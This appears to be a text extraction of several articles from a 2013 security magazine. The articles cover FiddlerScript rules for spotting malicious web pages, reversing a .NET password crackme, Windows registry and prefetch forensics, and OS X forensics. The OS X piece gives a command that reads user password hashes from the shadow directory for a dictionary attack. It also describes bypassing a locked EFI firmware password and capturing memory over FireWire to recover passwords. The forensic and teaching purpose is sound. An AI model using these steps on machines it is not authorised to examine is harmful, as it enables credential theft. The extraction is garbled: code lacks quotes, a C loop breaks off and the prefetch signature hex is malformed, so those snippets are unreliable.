It is also possible to save your entire capture as a SAZ (Session Archive Zip) file, Fiddlers na-tive file type, so you can re-open it later, in Fiddler. Password-protect SAZ files with AES encryption to store sensitive traffic captures that might have em-bedded malicious code (Figure 16).

Automating malicious code detection on the flyFiddler comes with a scripting engine that enables you to write powerful rules coded in JScript.net. To get started, open the CustomRules.js file from Rules>Customize Rules I recommend down-loading the FiddlerScript Editor and checking out the cookbook page to get yourself more familiar with it (Figure 17).

The advantage of writing rules is that you can in-spect both Requests and Responses and trigger a

particular behavior. In essence Fiddler gives you the power to manipulate them and even fake them.

I will show you some bits of code that have helped me to identify malicious URLs. Once you are com-fortable with the syntax and Fiddlers object model, as they say: the skys the limit.

Detect a malicious URl based on a string pattern

static function OnBeforeRequest(oSession: Session) {

var urlpattern = :8080/forum/;

if (oSession.fullUrl.match(urlpattern)

{

MessageBox.Show(Bad site identified);

}}

What does this do?The OnBeforeRequest function is called when your

browser is going to request a URL from the serv-er. Before that happens, you can create an event. First, we define a string we want to look for in that URL. Then, as Fiddler makes each request, it will check whether the URL contains that string. oSes-sion is the current session on which it performs a match on the full url.

Detect if a webpage contains malicious code

static function OnBeforeResponse(oSession: Session) {

oSession.utilDecodeResponse();

for(var i = 0; i < malware_signatures.length; i++)

{

if (oSession.GetResponseBodyAsString().

match(malware_signatures[i]))

{

MessageBox.Show(Malicious code found in + oSession.fullUrl);

break; } }}

The OnBeforeResponse function is triggered when a server sends its response back to the browser. Of course Fiddler being a proxy, it first has to go through it before it can reach our client.

Figure 16. Saving Sessions as a compressed archive with or without password protectionFigure 15. Export feature in Fiddler

Figure 14. Saving files captured by Fiddler to the local disk

01/2013 22

As the server s response can be encoded (com-pressed), we use the UtilDecodeResponse meth-od to decode it so it can be read properly. For each Session we loop through our list of malware signatures (they were loaded from a file into an array) looking for a match. We get the Responses content by using the GetResponseBodyAsString method which essentially places the whole con-tent into a variable. All we have to do next is find a match with one of our signatures.

Detect a particular file typeAs shown earlier, the Content-Type column in Fid-dler will tell you what the file type is. But how do we do this programmatically? Here is an example for detecting a Java applet.

By looking at the Response headers: Figure 18.

if (oSession.oResponse.headers.ExistsAndContains

(Content-Type,application/java-archive))

Or, by using MagicByte detection. (Magic num-bers are the first bits of a file which uniquely iden-tify its type).

if (Utilities.HasMagicBytes(oSession.responseBodyBytes, PK))

{

MessageBox.Show(Java applet identified);

}

Dump a responses body to diskFiddler allows for dumping of any web servers Re-sponse onto your local disk. You can automate that with a bit of code:

oSession.SaveResponseBody(C:\\Fiddler\\payload\\ + fileName);

Exploit Kit detectionEach Exploit Kit has its own characteristics that you can learn to recognize over time. Just like mal-ware, Exploit Kits have certain patterns in their landing pages (specific strings in the URL or in the source code) as well as the type of exploits they are serving. This is probably the most diffi-cult part of all as getting such an understanding requires long hours of exposure to exploit code, CVEs, etc

Whatever knowledge gathered can be translated into signatures that in turn can be applied by some of the rules mentioned above, making it possible to collect malicious URLs, gather your own statistics and see changes in the Exploit Kits release cycle.

JERoME SEgURAJerome Segura is a Senior Security Re-searcher at Malwarebytes with experi-ence in both client and server side mal-ware with a focus on web exploits re-search. He has built high interaction honey-clients to capture drive-by down-load attacks and has performed hun-dreds of web server remediations for in-fected WordPress and Joomla! sites.

Figure 18. Response Headers showing the type of file sent by the server

Figure 17. Fiddler2s Script Editor

01/2013 24

On the other hand, interpreted executables are such programs, that are compiled into intermediate (managed) code, which is a CPU independent set of instructions. Before inter-mediate code can be run, it must be first converted to CPU specific code usually by just-in-time (JIT) compiler. Intermediate code can be therefore run at any architecture, which JIT compiler is supplied for.

In this article, we will look at .NET applications compiled into Microsoft Intermediate Language (MSIL). We will be given a simple console applica-tion which asks for entering a valid name/password combination. We will use specialized disassembler and decompiler to understand the function of the analyzed program. We will also introduce some of the most typical intermediate language instructions.

After reading this article you should be able to take any MSIL program and start reversing it with-out problems.

PrerequisitesBefore you continue reading this article, make sure you have these two tools ILDASM and IL-Spy downloaded and installed on your comput-er. Use Google to locate the latest versions of both of the above mentioned tools. You will also need a simple target program which I programmed just for purpose of this article. See attachment for more information.

What is MSil?MSIL is kind of stack based assembly language with additional metadata compiled into execut-able. Metadata describe data types in the code (definitions, information about class members, references) and other data which are needed during execution. All these information (MSIL and metadata) are stored in PE (portable executable) file. Presence of this information enables operat-ing system to decide whether MSIL is being ex-ecuted or not.

A reverse engineer can recognize if he deals with MSIL or not by a glimpse at program entry point. Native executable entry point can contain pretty much anything, but MSIL executable starts with jump to mscoree.dll library (see Figure 1).

Figure 1. Entry point of MSIL executable

how To Reverse Engineer .nET fiWhen a reverse engineer wants to analyze an executable program, he usually grabs a specialized piece of software called debugger which helps him to analyze and trace parts of the code which he is interested in.


how To Reverse Engineer .nET fi

If you open the same application in List Viewer (in Total Commander) you may see the same as in Figure 2. Notice MZ and PE signatures in the beginning of the file, which are portable execut-able signatures. Then, there are a few bytes be-longing to the MSIL code itself, followed by BSJB signature, which denotes the beginning of metada-ta. In metadata, you can see various human read-able strings like , helloworld.exe, Enter name, Enter password, etc

Analyzing a MSIL application in Olly Debugger is possible, however not very convenient, because Olly Debugger is suitable for analyzing native code executables, but MSIL is interpreted code. Howev-er, other tools were developed to make MSIL anal-ysis easier.

introduction to ilDASMThe basic and the most low level application for analyzing Intermediate Language (IL) is a program called ILDasm (Intermediate Language Disassem-bler). When you open ILDasm and drag and drop on it application you want to analyze, you will see something like in Figure 3.

Figure 2. View of the binary form of application

Figure 3. Application opened in ILDasm

Figure 4. Disassembly of the Main method, part 1

After clicking on Main:void(string[]), you can see the disassembly of the main method of class hel-loworld see Figures 4 and Figure 5.

Lets look at disassembled instructions and lets try to guess what their purpose is. At the first glance, you can see that MSIL is a completely dif-ferent assembly language compared to standard x86 assembler.

Just the first instruction is NOP, which is No-OPer-ation, it does nothing. BR.S is a BRanch instruction, which is a jump, S means short form (short distance from the location of the instruction to jump target). LDSTR means LoaD STRing (here: Enter name), CALL calls the system function (here:WriteLine). STLOC.0 (Store LOCation) pops value from stack to local variable with index 0 (see .locals init in Fig-ure 4 for all local variables in the current procedure). In our example, ReadLine() waits for user input, this input is stored on the top of stack, which is later popped into local variable. LDC.I4.0 is LoaD Con-

01/2013 26

stant as a 4-byte integer, its value is 0. ADD.OVF add signed integer with overflow check. Remem-ber that all variables are taken from the stack, the results are always pushed on the stack too. There are no general purpose registers as you might know from x86 Intel architecture. ADD.OVF instruction takes two variables from stack, computes result and stores the result on the top of stack.

Notice instructions from IL_002D to IL_0036. Get_Chars system call gets a character from string loc.0 ( name was previously stored there ), index of character is now 0 (0 was stored in loc.3) the result is stored on the top of stack and then, add.ovf adds this result to ldloc.2 ( which was initially 0 ) and this new result is stored back by instruction stloc.2.

Similarly in instructions from IL_0038 to IL_003B, loc.3 is incremented by 1 and result is stored back into loc.3. Then this counter (loc.3) is compared to the size of name at IL_0043. CLT means Compare Less Than, it pushes 1 if value1 < value2, else it pushes 0. If counter is less than length of name, it jumps to IL_002C (at IL_0049) and the whole pro-cess repeats again. In short, this loop sums up all character in the entered name.

Now look at code from IL_004B to IL_005B. Us-er entered password (stored in loc.1) is convert-ed from string to int32 (System.Convert::ToInt32 at IL_004D) and the result of conversion is pushed on the top of stack. Then it is compared by CEQ

Figure 5. Disassembly of the Main method, part 2

(Compare EQual) with ldloc.2, which is the tem-porary variable which stores the result of the loop which summed all characters in user entered name. CEQ, similar to CLT, pushes 1 (of type int32) if value1 equals value2, else pushes 0. In our case, if both user entered and program com-puted integers are the same, then CEQ pushes 1, ldc.i4.0 at IL_0054 pushes 0, which are not equal, jump BRTRUE.S IL_0072 at IL_005B does not jump and therefore success message is displayed cor-rectly. Then the programs jumps to IL_0078 (from IL_0070) and application ends.

In C, I would write the algorithm as follows:

Void compute( char *name)

{

Int result = 0;

For( int i=0; i

www.hakin9.org/en

ILSpy, because it is free and it is great to work with. Another alternative may be Reflector.NET. First of all, run ILSpy, drag and drop on it the program you want to analyze. You can see it in Figure 7.

In the left column, you can see many system classes and, among them, our helloworld class. When you click on helloworld class, click (+) signs until you get to Main method, then in the right col-umn you can see decompiled procedure Main in C#. Now it looks much better and much easier to read and understand. We basically got the origi-nal source code from which we can easily verify the observations made during our analysis with IL-Dasm. If you wanted to see low level IL code, you can choose IL from dropdown menu (see Figure 8, text field with C# just below menu item Help.

ConclusionWe got the basic skills in reversing MSIL. We can distinguish if the PE executable file is MSIL or not by simply looking at its binary representation. We learnt to use ILDasm and ILSpy tools, as well as we got in touch with IL assembly instructions.

JARoMiR hoREJSiJaromir is a computer virus researcher and analyst. He specializes in reverse engineering and analyzing malicious PE files under Windows platform. He is interested in malware internals how it is packed/crypted, how it is installed into computer, how it protects itself

from being analyzed, etc He also likes to solve inter-esting crackmes. Except for reverse engineering, his hobbies include traveling, exploring new places, flying remote control models and playing board games.

Figure 8. Main method decompiled with ILSpy

01/2013 28

The focus of the Research study has been on four topics which are as follows: forensic analysis of the windows registry forensic analysis of prefetch. forensic analysis of data. uses of forensic tools.

Computer Forensics is a long used Technology that is gaining more widespread use and populari-ty within the IT community. It involves many things including gathering evidence of cyber crime, hacking activities and insider fraud.

The mostly widely used operating system is Mi-crosofts Windows. But at the same time it hap-pens to be the most exploitable and vulnerable to attacks. As it is known fact that almost all the oper-ating system consist of a Big Brother-Kernel that is responsible for monitoring the activities of the user. Even third party tools can be used for moni-toring the activities of the user. The usual proce-dure for Windows computer forensic is briefly dis-cussed below.

Forensic Analysis of Windows RegistryThe Registry is the one of the main part of the win-dows. It is a hierarchical database. It is also known as the configuration database of the Microsoft win-dows. It stores configuration data of every program

of windows such as Ms Office, Adobe reader etc. in registry. It replaces most text-based configura-tion files used in earlier versions of windows op-erating systems, such as ini files, config.sys files.

The registry of windows can be opened by typ-ing regedit in the RUN windows. It can be seen as one unified FILE SYSTEM. The Left Hand Panel which also known as the key panel. An organized listing of what appear to be folders.

There are many types of data you can find in the registry are described in this list:

PASSWORD INFORMATION STARTUP APPLICATION.

Figure 1. An unread email

introduction to Microsoft Windows ForensicsThe Interest in Computer forensics has increased in the last couple of years. This happened because criminals have moved to the digital world, using computers and computer networks to commit crimes. This article has been written to give an introduction to the world of computer forensics and explain how to apply it to windows computers.


introduction to Microsoft Windows Forensics

STORAGE DEVICE HARDWARE. INTERNET INFORMATION WIRELESS NETWORK. UNREAD EMAIL.

The importance of RegistryThe Registry is the soul of the Microsoft Windows Operating System and an exponential from it, due to vast amount of information stored in windows registry. The registry can be an excellent source for potential evidential data.

Registry Keys of Forensic value

hKCU/software/Microsoft/windows/currentversion/Explorer/comdig32/open/saveMRUMRU is the abbreviation for most recently used. * contains the full file path to the 10 most recently opened/saved files. This Key maintains al= list of recently opened or saved files like .txt, .pdf, .ppt etc.

hKCU/software/Microsoft/current version/ Explorer/ com dig 32/ last visited MRUThis key correlates to the opensave MRU key to provide extra information. Each binary value of registry under this key contains filename and the folder path of a file to which the program has been used to open or save it.

hKCU/software/Microsoft/windows/current version/Explorer/ Recent DocsThis key corresponds to % user profile % / Recent (My recent Documents). This key also maintains list of files recently executed or opened through windows Explorer. This key contains local or net-work files that are recently opened.

hKCU/software/Microsoft/windows/current version/Explorer/runMRUThe MRU list value maintains a list of alphabets which refer to respective values. This key maintains a list of entries executed using the START>RUN command. The alphabets are arranged according to the order the entries is being added.

Forensic Analaysis of PrefetchThe Prefetch files which are the main part of win-dows operating system are introduced in windows xp which are designed to speed up the application startup process. It contains the name of the exe-cutable, and a timestamp which indicating the last time the program was run. Although it is present in windows 2003, by default it is only enabled for boot

prefetching. The feature is also found in windows vista, where it has been argument with superfetch, Ready Boot.

Up to 128 Prefetch are stored in the * system root */Prefetch directory. Each file in that directo-ry should contain the name of the application and then an eight character hash of the location from which was run.

Signature of Prefetch FileEach prefetch file has a signature in the first 8 bytes of the file.

Windows xp and windows 2003 prefetch file sign is \x11\x00\x53\x43\x43\x41(0x41434530x00000011).

Windows vista and windows 7 prefetch files sign is \x\7\x00\x00\x53\x43\x43\x43\x4(0x414343530 x00000017).

Time Stamps of Prefetch FileThe creation date of the file indicates the last time the application was executed. Both the NTFS time stamps for a prefetch file and the time stamp embed-ded in each prefetch file contain valuable information.

Creation Time of Prefetch FileThe creation time does not have a static offset on any windows platform. The location of the creation time can be found using the offset 0x8 + length of volume path offset.

last Run TimeThe offset from the beginning of the file to the LAST RUN TIIME is located. A timestamp of when the application was last run is embedded in-to the prefetch file. At offset 0x78 on windows xp and windows 2003 at offset 0x80 on windows vista and 7 (Figure 2).

Figure 2. Last Run Time

01/2013 30

Forensic Analysis of DataThere are Two types of Data which are as follows:

HOST DATA META DATA

host DataHost Data is a type of data. It includes information about such components as the operating system and applications. Use the following procedure to analyze the copy of the host data you obtained in the acquire the data phase.

Identify what you are looking for. There will likely be a large amount of host data. So, you should try to create search criteria for events of interest. For example, you use the Microsoft windows sysinter-nals string tool to search the files located in the \windows\prefetch folder. This folder contains in-formation such as when and where applications were launched.

Examine the operating system data, including clock drift information and any loaded into the host computers memory to see if you can determine whether any malicious applications or processes are running or scheduled to run. For example, you can use the windows sysisntemals Auto run tool

to show you what programs are configured to run during the boot process or login.

Meta DataThe Documents are arguably one of the most im-portant areas where Metadata is found. It is no un-derstatement to say that in addition to attorneys wanting to find the metadata to prove who wrote the memorandum. The following list describes the basic types of meta-data found in a typical word processing documents:

Author Organization Revisions Previsions Authors Computer Name Hard disk Visual Basic Objects

You can find metadata in Adobe pdf files, Multime-dia files, web pages, databases and even geograph-ic software applications. Although Microsoft is the focus of much of the metadata extraction, metadata can be found in almost all application software.

The issue has reached such proportions that Mi-crosoft has published methods to remove meta-data from its documents for organization that feel they need to wipe their documents clean.

It is located within the documents falls into two distinct areas. Viewable by the user and not view-able by the user. If you cant view information you have to extract it.

viewing MetadataThe list describes the information you can find when you are looking at user viewable metadata.

Document StatisticsStatistical information thats often useful to deter-mine timeline and corroborate where about is also often found in the properties dialog box depending on which tab you choose (Figure 3).

Extracting MetadataEXTRACTING METADATA is also a process of ex-tracting the information from the metadata comed under the process of forensic analysis.

When you are extracting metadata, you have to use special software tools such as METADATA ANALYZER or ISCRUB to extract the data that you cant easily see. These tools can analyze the doc-ument at a binary level. Deleted text that might still be present in the documents. Figure shows the in-formation that metadata analyzer can extract.

Figure 3. Properties

Figure 4. Metadata analyzer

www.hakin9.org/en

Forensic Tools For Microsoft WindowsThere are many Forensic tools are available on the Internet. But Today we discussed some of the Im-portant tools which are mostly used in our Investi-gation are as follows:

ENCASE 4: Encase 4 is a complete forensic toolkit that covers much of the work that Foren-sic analysts carry out.

FTK: The access data Forensic Toolkit is an-other complete Forensic toolkit.FTK is recog-nized as one of the leading forensic tool to per-form email analysis.

PARABEN CASE AGENT COMPANION: Par-bans case companion is designed to optimize both the agent working the case. It has com-pibilty built in viewers for over 225 file formats and compatible with parabens p2.

WINTEX: Wintex is a universal Hexadecimal ed-itor. It is often used in Forensic examinations.

ConclusionThis Article provides a Technical introduction an overview of computer forensic procedure. I at-tempted to cover the Fundamentals aspects of computer forensics in MICROSFT WINDOWS from acquiring and verifying the evidence through a complete logical and physical analysis.

Given the popularity of windows operating sys-tem, it is important for computer forensic experts to understand the complexity of the windows. The information and potential evidence the exit in the Microsoft windows makes a significant forensic re-source.

AKShAy bhARgAnWARAkshay started his carrer in computer field at the age of 7 his career in ethi-cal hacking at theage of 17. He was trained by mr ankit fadia. After that he worked as an independent ethical hacker. He delivers speeches about cyber security to government organ-isations he solved many cases of cy-

ber crimes of nagpur and outside nagpur. Currently he is working with three organisatons in security field i.E. In-dian cyber army, hans-anti hacking society & internati-nal cyber threat task force.

01/2013 32

The goal of this paper is to provide an over-view of forensics techniques that can be used against a target system running Apples OS X operating system. Although a few papers have been written regarding this topic, they mostly con-sider techniques for acquiring an image on a pow-ered off system only. These techniques will be cov-ered, but other considerations such as responding to a situation where the system is logged in and/or powered on will be considered also. Other non Apple devices, such as virtual machines, modified Apple TV devices, or Hackintosh type clones are not specifically addressed, but some techniques can work on these systems also. There are some topics that will not be covered, such as Apple sys-tems running an older operating system than OS X 10.4, and the underlying data structures of the HFS and other native filesystems. Additionally, this paper will not discuss techniques for incident re-sponse not related to forensics. For example, top-ics such as uncovering malware or suspicious net-work activity will not be included.

Before you arrive on the scene of an alleged crime, or any situation that calls for a forensic anal-ysis, you should have a proper toolkit prepared for performing field analysis and acquisition. Most ex-aminers focus on tools geared for windows oper-ating systems, and also do not take into consider-ation trying to capture any live data from a system

that is not unlocked. By assembling a minimum set of hardware and software tools that are field ready, an examiner can easily be prepared for these types of situation. Also, it is a good idea to have a more extensive set of tools at a fixed lab site, allowing for more thorough investigation. These tools will be covered in more detail later, but ini-tially you would want the following items to be part of your field kit:

Apple Powerbook Laptop (Running 10.7 Lion or Later)

Windows 7 Laptop Firewire cable Forensics software (installed and live CD/DVD) Digital Still/Video Camera

(List: Items needed for an OS X forensics kit)

One question that might be asked, is what to do when first encountering a system that is clearly an Apple laptop or desktop of some sort. The same approach should be taken as with any other sys-tem, and the most volatile data should be captured first if possible. Also, remember that in any situa-tion that calls for a forensic analysis, full documen-tation should be kept regarding the chain of custo-dy for any systems or media that are collected. If the target system is running, and logged on, the exam-iner should make sure to move the mouse or pointer

Digital Forensics on the Apple oSX Platform Forensic studies on the OS X and Apple Macintosh family of computers have been previously focused on low level details of the filesystem or specific applications. This article attempts to look at the forensic process from a perspective of the field examiner, when encountering an OS X 10.4 and greater system using EFI based firmware. Whether a fixed desktop or mobile device running this operating system, techniques are covered which would allow the image acquisition of the target system, while capturing volatile data, and still preserving original evidence. Application level analysis is also discussed post image acquisition.


Digital Forensics on the Apple oSX Platform

device to prevent it from enabling the screen saver, and locking the screen. As with any potential crime scene, care should be taken not to disturb any evi-dence, or change the focus of the desktop to anoth-er window. Simply moving the mouse back and forth without clicking should accomplish this, although it is easy to mistakenly apply too much pressure to the built in trackpad on some laptops, which will cause a click to occur. The examiner can then take pictures of the device as is, and depending on any circum-stances or specific situation, programs can be run to acquire memory, check open windows, or disable encryption.

Obviously, the trade off would be that if the sys-tem is interacted with at all, there would need to be some sort of hash like state captured prior to inter-action. It might be possible to capture everything on video for this. Since it will be rare most of the time to find a system in such a state, there are other, and actually better options than exist with some Win-dows or other Unix based systems, assuming that the device is firewire capable.

The first technique that can be used, is to perform a live memory capture using firewire, assuming that the target system is already logged into, but in sleep mode. This can be determined by checking for ac-tivity on the front led, which would be blinking if the laptop is asleep. Even if this led is not blinking, be-fore trying to turn on or off the device, a few things can be done. On a laptop, the lid can be opened. On a desktop performing a right click should wake the device, in which case it can be put back to sleep. If these actions still yield no result, power can be ap-plied in the case of a laptop, since the Apple Mac-book and Powerbook both have a battery feature called the reserve. When battery power reaches a low point, the device is automatically put to sleep, and memory is saved. This is a feature called safe sleep. Apple Portables: Progress bar appears after waking from sleep, 2011]. When power is applied, the memory is read back from the safe sleep file on disk, and placed back into memory.

Once you have confirmed that the target is in sleep mode, the windows laptop running software such as Passware Kit can be used to retrieve the contents of memory, along with the firewire cable. The steps to perform this can be found in detail on the respective sites, but overall a sequence of events is as follows for Passware:

Prepare a bootable USB drive with the Pass-ware Image

Reboot the windows laptop using this USB drive Connect the FireWire cable to the target ma-

chine

Imaging process begins and completes. [List: Passware Usage]

After these steps are done, you have a full memo-ry image of the target machine, which can not only be used to find the password of the logged in user, but also can be searched for content. The recov-ered password can be used to login to the running machine, or also to decrypt FileVault protected home directories, since the same user password is used for both login and decryption [Apple Support: Encrypting Your Home Folder with File Vault, 2011]. According to the Apple site, FileVault is a system which encrypts files on a Macintosh computer. It can be found in the Mac OS X v10.4 Tiger operat-ing system and later. [Wikipedia]

If it is determined that the target system is not running, and is not in sleep mode, the next step would be to acquire an image. There are a few ways to accomplish this, the first of which is to place the target system in what is known as Target Disk Mode (TDM) [Kubasiak, 2007] which causes it to act as an external firewire hard drive. The sec-ond option is to use a boot disk. These are on-ly possible if the firmware of the system has not been locked. In fact, you should check to see first if the firmware is locked before proceeding with any of these steps, to avoid booting into the operat-ing system. This is because swapfiles are deleted during boot, which would erase valuable data [Ma-censtien Website]. To determine if the firmware is locked, press and hold down the option key be-fore pressing the power on button. Once the pow-er button has been pressed, the option key can be released thirty seconds later. The EFI will dis-play one of the following screens depending on it locked state.

In the first screen, we can see the lock icon and password prompt (Figure 1) after the option key

Figure 1. Locked EFI Password Prompt

01/2013 34

sequence on boot. If not locked, or after unlock-ing, the second screen (Figure 2) will be displayed showing the boot options. Now the machine can either be restarted in TDM or booted from a foren-sics live boot cd or dvd such as the Helix Live Fo-rensics OS [Helix Website].

If the target system is locked, and the investiga-tor would like to unlock it, the following simple pro-cedure can be followed. First the system should be powered off, and the bottom case opened. Next the amount of memory needs to be changed. This causes the system to recognize that some recon-figuration needs to take place. After this change is made, the system needs to be powered on, while holding the Command + Option + P + R keys, until a chime is heard for the second time [Browning, J., & Galvin, A., 2010]. The keys can now be released and the system powered down, and memory re-inserted. This procedure is only necessary if you want to boot the drive in the native system it was found it, using TDM or a Live CD/DVD. Otherwise the drive itself could be removed, and placed into another laptop or imaging station for image acqui-sition or preview. In the image, the layout of a mod-ern MacBook Pro laptop, and how the drive and

memory can be removed are shown (Figure 3). Once the system is unlocked, TDM can be used with another system running OS X. One impor-tant procedure that should be completed before mounting a target systems drive(s) using TDM, is the disabling of Disk Arbitration on the host ma-chine that will be mounting the drive [Craiger, P., & Burke, P. 2006]. This is important because other-wise changes will be made to the target disk once it is connected and auto mounted. Because dis-abling of this is only possible on another OS X sys-tem, and not necessary on a linux system, TDM should not be attempted with a Windows host. For field acquisition, in case the target system does not have a DVD rom drive (such as a MacBook Air), the Windows laptop in the investigators tool kit can be either dual boot with Linux or booted with the live CD/DVD itself, while the target is im-aged using TDM. To disable Disk Arbitration in OS X, the following commands should be performed as root on the OS X forensic machine:

root# cd /usr/sbin/ root# mv diskarbitrationd diskarbitrationd_temp

This essentially moves the disk arbitration pro-gram itself to a temp file that can be moved back easily later. Once these commands have complet-ed, the forensic machine should be rebooted, and Disk Arbitration is now disabled. One caveat with this technique is that it does not work if the foren-sic machine is using file vault itself. Making this change and rebooting will cause it to sit in an end-less loop, and the only way to fix it will be entering into single user mode, and moving the file back. In this case it would be best to use a standard hard-ware based firewire write blocker when mounting the system in TDM as an external drive. This does not appear to be documented anywhere.

Now the image can be taken using dd, either through TDM or a Live CD/DVD. If using an OS X forensic machine, performing the following com-mand will list the available drives:

Table 1. Output of diskutil

root# diskutil list

/dev/disk0 #: TYPE NAME SIZE IDENTIFIER

0: GUID_partition_scheme *500.1 GB disk0

1: EFI 209.7 MB disk0s1

2: Apple_HFS Meowmix 499.8 GB disk0s2


0: Apple_partition_scheme *999.5 GB disk2

Figure 2. Unlocked EFI Boot Options

Figure 3. Bottom Cover Removed from Macbook Pro


Digital Forensics on the Apple oSX Platform

1: Apple_partition_map 32.3 KB disk2s1 2:

Apple_HFS dlister 999.5 GB disk2s2


0: GUID_partition_scheme *250.1 GB disk3

1: EFI 209.7 MB disk3s1 2: Apple_HFS Absolut

249.7 GB disk3s2

In this case we can see that we have a system with three mounted drives. The first, disk0, is the hard drive for the laptop in this example, a 500GB SATA disk. The second, disk2, is actually a Fil-eVault volume mounted on the user dlisters home directory. The last entry, disk3, is an external SA-TA drive connected through a USB docking sta-tion, with a complete OS X system image on it tak-en from another system. To be able to image disk3 with dd, it is first necessary to unmount it, since it was automatically mounted when plugged in. To unmount it without completely disconnecting it, it is necessary to run the following command:

root# diskutil unmountDisk /dev/disk3 Unmount of all volumes on disk3 was successful (output of diskutil)

After this it is possible to run the command neces-sary to create an image using dd:

root# dd if=/dev/disk3 of=/root/driveImage.dmg bs=1024

This creates an image of the external drive or laptop in TDM, and places it into the root users home direc-tory. Commands such as this must be run as root, and assume that the root user has been created on the forensic machine. It is also important to take a hash of the drive and the drive image once complete.

If the image was acquired successfully, and the original evidence preserved, the next step is to pro-ceed with an analysis of the drive image and data itself. This can be accomplished through a variety of tools, some specific to the OS X operating system, and other standard software tools which are com-patible with many OS such as FTK.

Since the OS X operating system supports many types of file systems, such as HFS, HFS+, EXT, and NTFS natively, it is necessary to have a tool which can search and recover data on these types of par-tition. Some basic facts that an examiner should fa-miliarize themselves with, regarding the Hierarchi-cal File System (HFS+) are that is was derived from the original HFS, and that it is capable of journaling, as well as being case sensitive. It uses Unicode for filename storage, and also supports unix permis-sions on files. [Wikipedia] Although all of these fea-

tures are supported on the versions of OS X 10.4 and greater, a user can specify when creating a vol-ume, if they want to use HFS+ with journaling or not, and also if they would like to have it case sensitive or not. These options can be seen in the Figure 4.

Other necessary features would be the ability to mount and decrypt FileVault partitions, and also ad-dress the possiblity for a dual boot Windows and OS X target system. If the imaged drive is using whole disk encryption it will be difficult to impossible to crack this unless a brute force attack yields a re-sult. Although it may be also forensically difficult in some cases to decrypt a users home directory us-ing a brute force attack, it is feasible to perform a dictionary attack against the users password hash. The hashes are contained in the /Volumes/Absolut/var/db/shadow/hash directory, and can be obtained by issuing the following command for each guid listed. There is a single guid for each user:

root# cat FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000000 |

cut -c169-216 C642FD7E91DE8C63448DCD347A9B068D2C7538BAD35CE76A

(output of the cat command to obtain password hash)

In addition, there is much valuable information con-tained in Spotlight search caches, Safari brows-er information stores, mobile device data stored as backups, and virtual machines running within the operating system on platforms such as Paral-lels and VMWare Fusion. [Joyce, R., Powers, J., & Adelstein, F., 2008]. There are also tools with very specific use cases, such as Safari Cache View from Nirsoft, which allows you to view a Safari browser cache in a Windows environment [Nirsoft Website].

Figure 4. OS X Native Partition Types

01/2013 36

While some of the tools such as BlackLight from BlackBag Technologies, and MacForensicsLab from Subrasoft do support file recovery and extraction they do not give a holistic view when building a case such as an investigator would expect with a tool like FTK. There are some tools however that do give a holistic view and are specific to, and run on an OS X forensic machine against an OS X target image. One of these OS X specific tools is called Mac Marshall, and its interface can be seen in Figure 5.

It can be seen from the image that there are quite a few recovery and search options available from searching through virtual machines, to preview of spotlight images and videos. Spotlight is an index-ing engine and search technology integrated into OS X, that is used to keep track of files and their metadata. Whenever it is used, a hidden file is cre-ated called .Spotlight-v100 that contains the in-dexing data [Kubasiak, R. R., 2007]. It is important for the examiner to remember that since OS X is a Unix and specifically FreeBSD operating system, that files are normally hidden using a leading . on the filename. It is also important to know about the Resource fork and the Data fork.

Although it has been recommended for devel-opers to no longer use the Resource fork, it is still possible for the examiner to encounter this. If a Macintosh file is copied or moved to a file system that does not support this feature, it will be lost. There is a special case with FAT32 vol-umes, that OS X will create a special hidden file in the directory when copied over from an HFS or HFS+ volume. For example, if a file called file.txt is copied onto a FAT32 volume, another file called ._file.txt will be created containing the Re-source fork data [Kubasiak, R. R., 2007]. Also when the file is copied back into the HFS/HFS+ volume, the Resource fork data will be retained. This is similar to Alternative Data Streams within NTFS.

Some operations such as recovering deleted files can be done by simply moving them out of the

trash folder. This folder exists in each users home directory. The modified, accessed and changed timestamps can be determined for the files by run-ning the command as follows [Craiger, P., & Burke, P., 2006]:

Table 2. Output of stat command)

.Trash root# stat -x welcome.msg

File: welcome.msg Size: 11 FileType: Regular File Mode: (0644/-rw-r--r--) Uid: ( 501/ dlister)

Gid: ( 20/ staff)

Device: 14,5 Inode: 4001068 Links: 1

Access: Sun Dec 4 20:20:31 2011 Modify: Sat Oct 15 12:16:06 2011 Change: Sat Oct 15 12:20:58 2011

Much like other operating systems that use a re-cycler or trash folder, emptying the Trash folder in OS X will mark them as deleted in the HFS+ spe-cial catalog file, which is similar to the NTFS MFT. Although the allocated file space might be overwrit-ten after this occurs, the file contents still remain and are searchable with a physical level scan.

The main applications native to any OSX in-stallation are iTunes, iPhoto, Safari, and Apple Mail. Also there are services called mobileMe and iDisk, which allow for online backup and storage of data. Within each of these applications default data folders, there is a wealth of forensic informa-tion. There is also a primary location that stores not only preference data, in the form of .plist files for each of these (and other installed) ap-plications, but also contains registry like informa-tion. For example, within iTunes, backups of any mobile device such as an iPhone are stored here. Using various free tools which are available, the examiner can review this data to retrieve informa-tion such as contacts, call logs, SMS text mes-sages, and other information which are stored in the form of a SQLite database. There is also an application called Time Capsule, which allows for automatic backup, which could be done wire-lessly, or even to a cloud based (hosted) storage mechanism. Analysis of these files can be done manually, be viewing the files in a text editor, or using a tool such as MacMarshall.

In conclusion, it should not be an overwhelming or prohibitively expensive to prepare a field examiners kit, in the event that one encounters a target system running OS X. This could be an Apple Laptop, Desk-top, or modified device running OS X, but in each case the principles are the same, to acquire and analyze an image in the field or more extensively Figure 5. Mac Marshall [Mac Marshall Website]

www.hakin9.org/en

in the lab. Also, though care must be taken not to erase any volatile data, recent techniques now al-low the investigator to capture passwords and by-pass locked firmware to decrypt and recover pre-viously unavailable data. Although many of these tools are available to law enforcement only, there are still many available to the general public, which can be useful for research or education.

DAviD liSTERDavid Lister (CISSP, CASP, CCI-SO,CCNA,CEH, ECSA, CPT, RHCSA,Se-curity+) is a Security Engineer for Rackspace, and in previous roles was a software developer on various proj-ects written in a mix of Php, Python, Perl, Java, Ruby, C#, and .net. He has

also been active in many areas throughout the past ten years in various roles involving systems administration, network security, incident response, penetration test-ing, and application security.

Rerences 1. Mcdonald, K. (2005). To image a Macintosh. Dig-

ital Investigation, 2(3), 175-179. doi: 10.1016/j.di-in.2005.07.004

2. Craiger, P., & Burke, P. (2006). Chapter 13 MAC OS X FORENSICS x x.

3. Craiger, P., & Burke, P. K. (2007). Mac Forensics: Mac OS X and the HFS+ File System. Citeseer. Citeseer. Retrieved from http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.182.6018&rep=rep1&type=pdf

4. Kubasiak, R. R. (2007). Macintosh Forensics. New York.

